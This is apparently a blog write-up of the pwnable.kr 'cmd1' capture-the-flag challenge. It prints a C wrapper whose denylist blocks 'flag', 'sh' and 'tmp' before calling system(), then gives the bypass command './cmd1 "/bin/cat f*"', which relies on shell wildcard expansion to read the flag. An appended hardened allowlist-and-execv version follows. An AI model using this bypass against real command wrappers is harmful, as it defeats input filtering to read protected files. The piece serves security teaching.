cmd1

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

 

The source code is as follows:

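#include <stdio.h>
#include <stdlib.h>   /* putenv, system */
#include <string.h>

/* Denylist: returns non-zero if cmd contains "flag", "sh" or "tmp". */
int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "flag")!=0;
        r += strstr(cmd, "sh")!=0;
        r += strstr(cmd, "tmp")!=0;
        return r;
}
int main(int argc, char* argv[], char** envp){
        /* Overwrite PATH so commands are no longer found by bare name. */
        putenv("PATH=/thankyouverymuch");
        if(filter(argv[1])) return 0;
        /* The unmodified string is handed to the shell, which expands it. */
        system( argv[1] );
        return 0;
}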

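The argument passed in is filtered: it must not contain flag, sh, or tmp.

main also overwrites PATH with /thankyouverymuch, so the command has to be given by its absolute path. The filter only inspects the literal string, while the shell started by system() expands wildcards afterwards, so using a wildcard and running ./cmd1 "/bin/cat f*" is enough.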
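For contrast, a hardened form of the same wrapper, as an added example that is not part of the original post or the challenge: it keeps the denylist above for comparison, then validates with a character allowlist plus an allowlist of absolute program paths and runs the result with execv, so no shell re-interprets the checked string. The names ALLOWED, SAFE and parse_checked and the permitted programs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* The denylist from the page, unchanged in behaviour. */
static int filter(const char *cmd) {
    int r = 0;
    r += strstr(cmd, "flag") != 0;
    r += strstr(cmd, "sh") != 0;
    r += strstr(cmd, "tmp") != 0;
    return r;
}

/* Hypothetical allowlist of programs the wrapper may run (absolute paths). */
static const char *const ALLOWED[] = { "/bin/ls", "/bin/date", NULL };

/* Only these bytes may appear; this excludes every character the shell
 * treats specially (glob, quote, variable, substitution, separator). */
static const char SAFE[] =
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/_.- ";

/* Splits cmd into out[] (at most max-1 words, NULL-terminated) using buf
 * as storage. Returns argc, or -1 if the command must be refused. */
static int parse_checked(const char *cmd, char *buf, size_t buflen,
                         char *out[], int max) {
    int argc = 0;
    if (!cmd || strlen(cmd) >= buflen) return -1;
    if (strspn(cmd, SAFE) != strlen(cmd)) return -1;  /* metacharacter */
    strcpy(buf, cmd);
    for (char *w = strtok(buf, " "); w; w = strtok(NULL, " ")) {
        if (argc == max - 1) return -1;               /* too many words */
        out[argc++] = w;
    }
    out[argc] = NULL;
    if (argc == 0) return -1;
    for (int i = 0; ALLOWED[i]; i++)
        if (strcmp(out[0], ALLOWED[i]) == 0) return argc;
    return -1;  /* program not on the allowlist */
}

int main(int argc, char *argv[]) {
    char buf[256], *args[16];
    if (argc < 2) return 1;
    fprintf(stderr, "denylist: %s\n", filter(argv[1]) ? "blocked" : "passed");
    if (parse_checked(argv[1], buf, sizeof buf, args, 16) < 0) return 1;
    execv(args[0], args);  /* no shell, so the checked string is what runs */
    return 1;
}
```

The denylist passes the wildcard command from the post, while parse_checked refuses it twice over: the `*` is outside SAFE and /bin/cat is not in ALLOWED.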

posted @ 2021-09-29 13:14  hktk1643